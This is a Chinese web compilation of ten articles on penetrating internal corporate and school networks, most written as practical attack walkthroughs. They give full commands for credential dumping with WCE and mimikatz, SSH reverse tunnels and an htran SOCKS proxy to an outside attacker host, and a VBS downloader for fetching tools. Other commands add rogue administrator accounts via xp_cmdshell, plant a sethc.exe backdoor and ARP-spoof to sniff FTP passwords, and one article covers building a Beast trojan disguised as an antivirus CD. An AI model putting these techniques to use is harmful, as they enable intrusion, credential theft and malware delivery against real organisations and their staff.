浅谈内网渗透

“我爱吃米饭”通过精心收集，向本站投稿了10篇浅谈内网渗透，以下是小编整理后的浅谈内网渗透，希望能够帮助到大家。

篇1：浅谈内网渗透

引子

离上篇文章的时间过去很久了，答应写一篇内网渗透的文章，今天抽点时间，把这个坑给添平了吧，标题是浅谈，所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验，积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了，我这里纯粹抛砖引玉，把前辈级人物的经验集成在一起，也算基础篇吧。如果有不足的地方或者有更好的实现方法，欢迎随时交流。交流方式就以邮件吧，邮件地址在文章结束处，上次公开的Q加了很多人，即时通讯=即时打扰，过段时间集中清理，如果不小心被清理了，诸位勿怪，这里算是提前打个招呼。

正文

假设我们现在已经处在一个内网中，该内网处于域中。我们的终极目标是实现对域控制器的控制。

内网信息获取

信息的获取直接通过Windows自带的命令即可实现，简单写出来：

ipconfig /all

netstat –an

net start

net user

net user /domain

net group “domain admins”       #查看域管理员

net localgroup administrators

net view /domain

dsquery server        #查看域控服务器

dsquery subnet       #查看域IP范围上述命令执行完，内网的信息基本上就获取的差不多了，个别命令根据个人爱好请自行增加减。

向域控出发

假设执行dsquery server的结果我们发现域控服务器为DC-和DC-两台，而我们执行命令的主机也是在域下的，那么我们可以直接WCE -w了，运气好的话明文密码直接出现在你眼前，另一个外国人写的神器叫mimikatz也能够获取明文密码，图我就不截了，大家自己动手吧！

如果运气好，那么恭喜，此时你已经域控管理员密码在手，域中随意可行走。使用域控管理员密码登录域控服务器，使用pwdump、fgdump等各种密码dump工具对整个域控的密码散列进行获取即可。

如果运气差，使用wce没有得到域管理员的密码，那么你可以尝试如下方式：

Incognito

Smb

Wce –s欺骗

Sniffer + ARP

其他（玉在哪里？）Sniffer动静很大，不到最后建议还是不要尝试了。

结束语

此文仅以技术交流为目的，拒绝任何形式的攻击行为。

想了半天我决定还是在结束语前面加上上面这句话，渗透是个技术活，也是个艺术活，各种奇技妙巧尽在其中，同时环境也复杂多变，但万变不离其宗，以静制动，后发制人。

文章有点虎头蛇尾了，但总算是兑现诺言了。

下一个坑

又给自己挖一个坑，想写点关于SCADA的，但是这东西太… 如果有更好的我会换掉。

关于我

R0b1n，Freebufer，Pentester

Email：G.r0b1n[a.t]foxmail[dot]com

篇2：浅析企业内网渗透

起，Google、SONY、RSA等诸多大型企业遭受APT渗透攻击，对机密资料的保护和内部控制越来越受到人们的重视，本文以攻击者的角度，分析企业内网安全的入侵突破点，希望能给大家带来启发，更好的做好内网防控。

一个企业，可以是不同行业，他们所包含的机密数据，隐蔽数据，功能控制，和对整个旗下的可信任域都是极为重要的安全方向。

对于初具规模的企业来说，内部沟通需要邮件，即时沟通需要im软件，需要有域控，需要有核心交换机，有几个指定内外网交换出口，或连通IDC的内网通道，这些，对于互联网企业来说都是必不可少的，但是完善的同时也存在着一些安全隐患。

0×01邮件与IM安全

或 许邮件地址的方法简单，通俗一些，可以看招聘所留下的邮箱，可以看网站上的联系我们等等。而利用邮件作为入手点，也是大部分想渗透到企业内网的 hacker们的必备工具之一。邮件中，可以包含可执行文件，可以放木马，可以放挂马链接，也可以做钓鱼。总之第一步就是诱惑其种马。%关注，企业内网安全，第一处，邮件安全%

其次，获得相关企业的im软件，沟通内部人员，以获得信任，同样可以发送一些木马之类的，这一步主要是诱导。

%关注，企业内网安全，第二处，即时通讯%

以上这两种方法可以不费吹灰之力，只要马做的好，信息写的诱惑一些，就可以搞定内网的某些机器。

0×02 办公网安全

当获得内网机的权限后，便可以用其来做跳板，代理，或直接命令操控都可以。%关注，内网办公平台办公网安全%

办公网的机器，一般都是由域来控制的，而获得了域控管理员的账号密码，那便是获得了内网所有加入域的机器的权限，而在没获得域控的前提下，可以看看内网的共享，内网的弱口令，内网的一些测试服务器（这种服务器一般都是无密码或账号密码一样或者是弱口令）

如果是以太网，可以进行内网的一些账号密码嗅探，但是如果有IPS等设备，很容易被监控到，

另外在，办公网的机器上，会存有一些常用服务器的账号密码，如果是明文那么就很容易得到相应的信息及权限%关注，服务器密码及机密数据的保存%，得到这些，对整个内网及IDC的渗透便会更近一步。

如果，弄到了核心交换机的账号密码，那么便是掌握了整个内网的命脉，如果是恶意行为，一个病毒便可以弄瘫全网。

0×03 web安全

除 此之外，可以有另一种思路，便是我们经常所讨论的，web安全，因为web应用所在的IDC一般会有内网专用的运维通道，如果没有，也可以从运维的来源 ip找到企业的出口ip，如开放了某些协议，对其DDOS，影响也会很大。Web的渗透这块就不用说了，各种方法，提权，其实在去渗透C段的时候，可以观 察其登陆的来源IP，可能有意向不到的结果。%关注，web安全%

0×04 子公司间的策略控制

有些公司的总公司安全做的很好，但是他们疏忽了子公司，因为总-子会有内网连通，子公司的安全性比较薄弱，容易入侵，这样渗透总公司便更加容易。%关注，与子公司之间的策略及控制%

当 得到了一个企业的一定网络权限，也许就会掌握这个企业的命脉，机密资料，人员信息，网站的控制。举个例子，如金融行业，股票操盘等数据对其极为重要，如泄 露或许会使一大部分人盈利，自己也会损失惨重。传媒行业，可以屏蔽信息，修改舆论，获得内部新闻资料及相关人士的信息。另外，还有游戏行业，搜索引擎，等等。都需要来关注内网的安全。

0×05 总结

其实，对于内网的渗透，要一步一步来，不能着急，不要产生过大的数据量。而对于其安全来说，要完善监控，完善策略，加强管理，得到重视。

企业安全，需要得到重视，如果一旦被攻破，那么将会损失惨重，如果遇到有目的，且恶意的攻击渗透，那么这将会是一场腥风血雨。

​

篇3：关于linux内网渗透

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方 面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题，

由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令：

ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host

ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host

ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.

后台认证用户/密码，通常和-N连用，不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.

被登录的ssd服务器的sshd服务端口。

-L port:host:hostport

将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-R port:host:hostport

将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-D port

指定一个本地机器 “动态的’’ 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS4 协议, 将充当 SOCKS4 服务器. 只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发.

-C Enable compression.

压缩数据传输。

-N Do not execute a shell or command.

不执行脚本或命令，通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.

在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接，

注：这个参数我在实践中似乎始终不起作用)

如果想要了解更多关于SSH的细节，可以 man ssh ，或参照ssh的DOC.

实例：

——————————————————————————

当骇客A从互联网入侵了RISUN企业的一台服务器，机器名称为 GBOSS_WEB

GBOSS_WEB 信息：

外网IP：255.25.55.111

内网IP：10.168.0.10

网络架构方式为，路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。

骇客A通过利用80端口开放服务的WEB脚本漏洞，成功继承到GBOSS_WEB的httpd权限，然后通过perl或者其它语言创建SOCKET 获得一个远程sh shell。由于back回来的shell可能不稳定，或者使用起来不方便，可以采用SSH建立一个隧道，将GBOSS_WEB服务器上的22端口映射至 骇客的本机上(本文章用于演示的骇客机为0x.cn)；

通过得到的sh shell，执行 $python -c ‘import pty; pty.spawn(”/bin/sh”)’ 获得一个ttyshell(因为ssh想要tty的支持)，然后通过如下命令，映射GBOSS_WEB服务器的22端口至202.65.208.142的 44端口；

$ssh -C -f -N -g -R 44:127.0.0.1:22 ring04h@202.65.208.142

这样登录0x.cn的ssh服务，ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口。

骇客A通过利用操作系统系统提升权限至ROOT，再继续渗透过程中，发现内网还存在另外一台名称为GBOSS_APP的服务器。

GBOSS_APP 信息：

内网IP：10.168.0.20

骇客通过嗅探获取了GBOSS_APP服务器的FTP信息，GBOSS_APP服务器FTP保存有RISUN企业的核心数据，由于数据量庞大，需要FTP续传功能，可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口；

$ssh -C -f -N -g -R 2121:10.168.0.20:21 ring04h@202.65.208.142

当骇客成功root掉内网中另一网段中的服务器BILL_APP时，需要从外网下载一些工具，由于内部访问控制策略，BILL_APP无法连接网， 此时可以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口，然后通过GBOSS_WEB建立的隧道，下载所需工具。

在GBOSS_WEB服务器上执行：

$ssh -C -f -N -g user@10.168.0.10 -L 8888:202.65.208.142:80

通过建立隧道后，在BILL_APP上执行 wget 10.168.0.10:8888/thepl 等同于访202.65.208.142/thepl

本文详细的概述了如何建立隧道的过程，以及相关参数的使用方法，各位懂的高手可以直接飘过。

篇4：渗透内网方法之巧用代理

代理在入侵里的作用-----妙用代理，渗透内网

一、踩点

主机: www.baidu.com/

OS:Windows + IIS 5.0 + MSSQL

端口:80 21

数据库放内网，IP为 192.168.1.2 ,更重要的是内网数据库可以上网.

首页存在注入漏洞，sa登陆.

注入点:

www.baidu.com/list.asp?id=1

二、入侵思路

1.给内网目标机装个代理服务器

2.把弄好的那个代理端口映到公网.

3.本机用sockscap连接公网映的那个端口，这样，自己也就进到了内网，

4.接下来就是找共享，嗅探，社会工程学等等了。

三、入侵准备

1.公网肉鸡一只:218.3.1.1

2.工具:htran2.4,SocksCap,扫描器一份，NBSI 2.0一份。

3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)

4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25

四、入侵进行时

1.工具上传:

在nbsi下执行:

echo Set x= CreateObject(^“Microsoft.XMLHTTP^”):x.Open ^“GET^”,LCase(WScript.Arguments(0)),0:x.Send:Set s = CreateObject(^“ADODB.Stream^”):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs

然后下载工具:

cscript. down.vbs IP/htran.exe htran.exe 这个可以在网上找下

2.安装Socks5服务

在nbsi下执行:

htran.exe -install //安装Socks5服务

htran.exe -start //启动Socks5服务

3.反弹进行时

在B上运行: htran.exe -s -listen 520 5200 //监听端口

在nbsi下执行:htran.exe -s -connect 218.3.1.1 520

3.进入内网

现在用SocksCap连接 218.3.1.1 的5200端口，就等于进入了他的内网，

五、渗透内网

接下来就可以扫描，嗅探，等等，也就是后话了。

篇5：内网渗透技术之渗透学校内网过程

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述，对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。

从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。

先来看看目录能穷举出来哪些东西。

先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

E：盘可以浏览

F：盘可以浏览

本站ASPX 类型网站，使用的是MSSQL数据库。显示密码不是最高权限的用户，就是是个DB用户提权也不能马上到手。

再翻翻别的站点，目录可以浏览一个个找吧。

发现一个目录web.config有SA用户

连接数据库信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****

打开aspxspy，使用database连接功能。

登录成功，显示SA看来应该没有降权。

连接状态是MSSQL ，要先启xp_cmdshell

接着执行下命令“whoami”

good，system 权限，下面就是添加一个账号了。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启

Exec master.dbo.xp_cmdshell 'netstat -ano'

OK,状态正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389，可以连接。

说明管理做了端口映射，这就不要转发端口了。省了很多功夫！

这才拿到了一台服务器的权限，从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200，同样是MSSQL SA权限。

再利用aspxspy 数据库连接，

郁闷的事情发生了，不能连接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问，

按道理讲数据库能使用的情况下应该可以成功连接上的，难道没有配置TCP/IP访问数据库？疑问产生了，无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL，有查询分析器和企业管理器。这又成了我们的工具。呵呵！

SQL分析器连接之，仍然无法连接。

先测试下所在的MSSQL服务器机器的存在性。

成功响应，说明服务器存在。

运行mstsc试着3389连接下，显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。

点击浏览一看，这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

成功返回查询窗口。试下xp_cmdshell

发现不存在，恢复之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK！

执行命令“whoami”,虽然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。不明真像了。

思路：开了3389可以用sethc.exe 替换来。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替换之？

问题又来了，提示磁盘文件不足。

利用xp_dirtree查看下C盘

EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目录，删除一个数据库的备份

再执行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一个文件被复制，说明成功。3389 5次shift未弹出。

再试下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开！

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。

exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器，此次渗透就此结束。

总结：内网渗透技术并非难以琢磨，细心研究就能发现每个细节与步骤都能激起灵感。内网从端口转发到外部连接，再从3389登录内部3389 跟跳板技术差不多

​

篇6：尝试用iPhone做内网渗透

在91手机助手网看了有几款 for iPhone的网络软件，就下载到手机上，今天中午在一间“仙XX”餐厅吃饭，有免费无线WIFI，就测试一下软件功能。图实时发到微博，现在整理了一下，记在此文，作为存档日后复习用。

先问了服务员取得WIFI接入口令，连上网络，首先扫描内网有多少台设备正在连接

然后显示设备列表，包括IP地址，MAC地址

先用浏览器输入网关IP地址，出现了WEB管理的验证窗口，我随手输入几个弱用户口令，和餐厅服务员提供的WIFI口令，都显示错误，以后有时间再想办法社工一下。今天只是测试软件功能。

接着PING和扫描192.168.0.2这台设备，从开启的端口判断，这台应该是连接无线路由的主机，从返回的PING值判断，主机操作系统是WINDOWS，

我抬头看看餐厅柜台方向，这货原来是一台手提电脑。连接着拨号路由。

由于准备不足，我没下载VNC连接软件，所以测试不了是否存在弱口令。还有1433端口的MSSQL是否还有SA....

然后逐台设备扫描，除了一台设备开启了23端口，其他很多是手机用户，并无开启端口。

用for iPhone的ISSH软件进行TELNET连接，用了几个弱口令登陆失败，也没在继续了

今天主要是测试软件功能，软件功能的实现结果让人满意。

以下是几张不同远程桌面软件用iPhone手机连接时的截图

此文提醒大家在公共WIFI上网时，也要注意保护隐私，尽量将数据进行加密，此次测试如果有for iPhone的嗅探软件，那可不得了。

篇7：黑/客渗透坚固内网案例

本案例为读者提供了一个如何渗透到看起来不可渗透的网络的思路，这里给出的某些步骤可能已经超出了渗透测试的范围，但是，如果我们的合同要求进行任何形式的渗透，那么看一看这个案例，是否能够为我们提供一些可能性。本案例也展示了 如何获取系统访问权的一般思路，如果此路不通，那就另辟蹊径。

李明一直不知疲倦地尝试穿过PIX防火墙进入微网公司的网络。在试遍了扫描、Web攻击、无数个SQL注入无效后，最终李明决定采取秘密行动。他向微网公司发送了一款木马，该木马能够被安装到任何一台计算机上，能够使连接穿越防火墙返回到李明指定的机器上。

李明使用了功能强大、相当流行的木马Beast，将它刻在光盘上，并进行了autorun配置，当这张光盘放入光驱中后，就会自动运行（Windows 和XP要求用户决定是否运行）。接着，他坐下来等待有人运行这张光盘并安装木马。这个木马被配置为与李明家中的电脑进行连接。下面是李明采取的步骤。

步骤1：首先要做的事情是创建Beast的后门服务器。通过单击“Build Server”按钮，李明选择了explorer.exe，Beast将把自己注入到这个程序中，如图12-69所示。这样，绝大多数反病毒软件都不会检测到Beast。

步骤2：由于防火墙隔离外部主动发起的连接，因此李明创建了一个不侦听的Beast，而由Beast主动生成连接到李明计算机上的连接请求，也就是采用了反向连接方式。在“Basic”中，李明输入了80端口号作为他要使用的侦听端口，并选中了反向连接（Reverse connection）单选按钮，如图12-70所示。

步骤3：接下来是配置李明所用攻击计算机的IP地址，以便让后门程序知道应该连接到什么地方。单击“Notifications”按钮，李明可以输入DNS名称，也可以输入IP地址。这里他输入了自己的攻击计算机使用的IP地址172.16.0.13，如图12-71所示。

步骤4：李明保存这个服务器，并将其命名为installprep.exe，这个名字不管放到哪一个安装光盘上都看起来无害，

李明将在他做的自动运行光驱中使用这个文件。

步骤5：现在需要创建能够自动运行Beast服务器程序installprep.exe的自动运行光盘了。创建一个如下所示的autorun.inf文件：

[AutoRun]open=installprep.exe

当光驱被配置为自动运行时，插入光盘后，installprep.exe就会自动运行。

步骤6：接着，李明提取正常反病毒光盘上的所有文件，目的是伪装自己，并使用修改后的autorun.inf取代原来的autorun.inf，并将installprep.exe也放在文件夹中。

步骤7：李明将这些文件刻录到光盘上，并制作一份看起来很专业的反病毒软件标签。

步骤8：接着，李明编写了一封语气恳切的附信和解释CD内容的操作手册，说明“这是一款新一代的企业级、主动型防病毒软件的90天试用版。将这个软件安装到你的服务器上就会发挥该产品的所有功能。”

步骤9：李明生产了10张这个CD，包括操作说明一起，邮寄给微网公司8个不同的人。他将最后的两张放在了微网公司用的停车场里，以便有人能够看到和使用。李明希望这些员工能够把这张CD插入到他们办公室的计算机中，并执行他自己定义的installprep.exe。

步骤10：李明在他的攻击计算机上启动Beast的客户端，并配置为侦听端口80。

步骤11：李明等待了几天，直到有人真的安装了这个CD为止。这种方式能够达到目的，一点不用吃惊。

步骤12：现在，李明利用被感染的计算机作为进入该网络其余部分的跳板。他开始下载他的整个 工具箱，准备与微网公司大战一场。

现在我们看到，只要有人插入CD自动播放、或者双击安装程序进行安装，Beast木马就被安装并启动执行，向外部世界打开了内部网络的一扇大门。防御此类攻击的最好方法只能是员工教育及持续不断的反病毒监控。

篇8：渗透某知名游戏代理商内网全程

一、起因

这天刚一上Q，经常说自己是 的“神X月”(他不让我说他网名)就叫我和他一起搞一个游戏官方站，原因是他的一个朋友要他帮忙盗这个游戏的号，神X月没办法，就只好去搞官方拿数据库了。听了他的话我爆汗了1分钟，然后就和他开始了渗透。

二、郁闷的开始

大家都知道，游戏官方站几乎是没有漏洞的。神X月给了我这个游戏的官方网址*e.*****o.com，是个二级域名，网站是asp.net页面，如图1所示。

一级域名是一个游戏代理商，如图2所示。

手工检测了一下，没有明显的注入漏洞，再用了几个工具扫都扫不出注入点，注入这条路断了～～郁闷中.....

忽然，想到了asp.net可能有爆路径的漏洞，不管怎样，获得多一点信息总是好的，于是马上测试了一下，无功而返，然后再用几个比较老的asp.net漏洞检测工具对其进行了检测，照样是无功而返，

继续郁闷.....问了下神X月的进展如何，他说没一点进展，唉，看来是没搞了～～

三、成功初现

在我准备放弃的时候，突然看到上传玩家照片的功能，如图3所示。

感觉这可能就是成功的转折点，但这时候我的信心已经减了一大半，我不抱希望地打开了链接，看来不需要身份验证，直接传了个之前写的超浓缩diy小马，返回上传不成功，把文件名改为ji.gif.asa，同样是上传不成功，看来这个程序并不是从左边来判断文件类型的，我终于放弃了。把上传点丢给神X月，并和他说我不搞了，过了5分钟，他说传了文件上去，但就是不能执行，还有就是服务器不支持asp。

怎么他能传任意文件我就不能呢?问了他之后终于知道是gif文件头欺骗，自己真笨，这都没想到!于是传了asp.net版的diy小马上去，发现的确执行不了，换了一句话和lake2的木马也执行不了，如图4所示。

[1] hack.hack50.com/HTML/0912110443_2.html'>[2] hack.hack50.com/HTML/20080912110443_3.html'>[3] hack.hack50.com/HTML/20080912110443_2.html'>下一页

篇9：机锋网Struts框架漏洞可导致内网渗透

#weibo.com/u/3022690473欢迎收听我的微博！#

#其实这个问题是由于一个远程命令执行引起的内网渗透#

#问题出在机锋市场合作厂商管理后台：#amarket.channel.gfan.com/system/LoginAction!login.action#

#权限很大#

#先反弹个shell出来吧#

#我现在在10.8.8.0这个段中，既然是root权限，就不考虑提权问题，直接抄刀nmap内网走一圈#

#Nmap done: 256 IP addresses (136 hosts up) scanned in 852.68 seconds#

#总共有136台机器在线，机器还是蛮多的，其他段如果在扫完，估计都得天亮了！#

#本想在内网渗透下去，但是想了想被查水表就不好了#

#安全无小事#

修复方案：

新年快乐，厂商快拿红包来！

升级Struts框架

加强管理

篇10：ARP监听渗透内网的方法网站安全

假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆

第一步:

tracert 61.139.1.1

C:/WIN2000/system32>tracert 61.139.1.1

Tracing route to HACK-4FJ7EARC [61.139.1.1]

over a maximum of 30 hops:

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

Trace complete.

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能

进行ARPSNIFFER了

第二步:看本机IP设置和网卡情况

C:/WIN2000/system32>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : smscomputer

Primary DNS Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Broadcast

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

Connection-specific DNS Suffix . :

Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection

Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6

DHCP Enabled. . . . . . . . . . . : No

IP Address. . . . . . . . . . . . : 61.139.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 61.139.1.65

DNS Servers . . . . . . . . . . . : 61.139.1.73

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地

方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0

的话也只能嗅探到通过自已的数据哟.

从上面我们还可以知道网关是61.139.1.65

第三步:查看本机时间

C:/WIN2000/system32>net time //127.0.0.1

//127.0.0.1 的当前时间是 2003/1/28 下午 09:13

命令完成成功

要注意的是这儿的时间是12小时式,用at命令应要24小时式

第四步:编写启动ARPsniffer的bat文件

C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter

Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

Usage: ArpSniffer [/RESET]

第五步:后台运行开始嗅探咯

C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat

注意:这儿的时间要用24小时式

arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

执行完第四步要先安装WINPCAP 2.1驱动

同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:/winnt/system32>pulist

...................

conime.exe 248 NT AUTHORITY/SYSTEM

explorer.exe 1864 SMSCOMPUTER/Administrator

CSRSS.EXE 2256 NT AUTHORITY/SYSTEM

Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了!

WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM

......................

杀了它

C:/winnt/system32>pskill 2322

PsKill v1.03 - local and remote process killer

Copyright (C) 2000 Mark Russinovich

Process 2322 killed.

C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)

...............

61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.139.1.79(21)->61.188.218.179(1404)221

61.139.1.79(21)->61.188.218.179(1404)221

............

............

特别要注意的就是PASS哈:)

----------------------------------------------------

付录:

前台正常执行的显示

C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

Network Adapter 0: Intel(R) 8255x Based Network Connection

Enable IP Router....OK

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88

Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

有时这儿要先显示can not open driver(0)不管它等一下就可以了

Begin Sniffer.........

【浅谈内网渗透】相关文章：

1.ARP监听渗透内网的方法网站安全

2.渗透心得

3.渗透法制教育总结

4.德育渗透教案

5.渗透法制教育演讲稿

6.小事情渗透大道理作文

7.德育渗透教学反思

8.语文渗透德育工作计划

9.渗透的意思是什么

10.渗透测试的介绍